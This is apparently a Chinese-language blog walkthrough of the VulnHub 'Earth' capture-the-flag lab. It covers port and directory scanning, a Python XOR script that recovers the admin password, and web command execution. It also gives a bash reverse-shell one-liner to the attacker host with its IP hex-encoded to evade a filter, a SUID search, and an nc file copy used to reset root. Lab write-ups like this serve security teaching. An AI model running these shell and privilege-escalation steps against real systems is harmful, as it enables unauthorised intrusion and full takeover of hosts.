Vunlhub_Eearth

Posted 2022-01-18 NowSec

本文内容涉及程序/技术原理可能带有攻击性，仅用于安全研究和教学使用，务必在模拟环境下进行实验，请勿将其用于其他用途。
因此造成的后果自行承担，如有违反国家法律则自行承担全部法律责任，与作者及分享者无关

主机信息

kali：192.168.3.150
Earth：192.168.3.149

信息收集

使用Nmap探测目标主机发现开放22、80、443三个端口

nmap -A -p- 192.168.3.149

打开80端口查看是一个400的页面

访问443端口发现是一个testpage

查看源码也没获得有价值的信息

扫描80和443端口网站的目录，没没有获得什么信息


接着再看nmap的扫描信息发现在443端口有两个域名

然后将两个域名添加到hosts文件中

浏览器访问域名发现可以正常显示

在网站下面找到了一个输入框和一些文字

通过扫描找到了一个登录页面

通过对另一个域名的扫描找到了一个robots.txt的文件

dirb https://terratest.earth.local /PTE_Tools/Wordlist/ctfDict/ctf.txt

打开厚爱发现一个testingnote.*的文件

然后根据提示的后缀进行尝试，找到了一个testingnot.txt的文件

访问testingnotes.txt中提到的文件得到一下内容

查看testingnotes中的提示，得到加密使用XOR方式，terra为管理员

如果使用XOR，那么猜测http://earth.local页面底部的字符串应该是用于异或运算

将testdata.txt保存下来
然后使用python写一个脚本，得到密钥

# -*- coding: utf-8 -*-
# @Time : 2021/12/26 6:36 下午 
# @Author : JacobWang
# @File : xor.py 
# @Software: PyCharm


import binascii


# data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"


# data1 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"


data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1, 16) ^ int(f, 16)))

使用密钥earthclimatechangebad4humans登录
登录后发现可以执行命令

使用命令执行来查找flag

find / -name "*flag*"

得到第一个Flag

GETSHELL
在测试中发现使用bash、python反弹shell均不行，然后将IP替换为16进制后可以正常反弹

bash -i >& /dev/tcp/0xc0.0xa8.0x3.0x96/1234 0>&1

查找具有SUID权限的可执行文件

find / -perm -u=s -type f 2>/dev/null

尝试执行这个文件发现报错，提示触发器不存在

提权
使用nc将这个文件传送到本机

kali: nc -lnvp 4444 >reset_root
Earth: nc 192.168.3.150 4444 < /usr/bin/reset_root

使用ltrace调试后发现会检查三个文件是否存在

再次执行后重置完成

然后切换到root账户密码Earth

最后拿到root_flag

‍

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec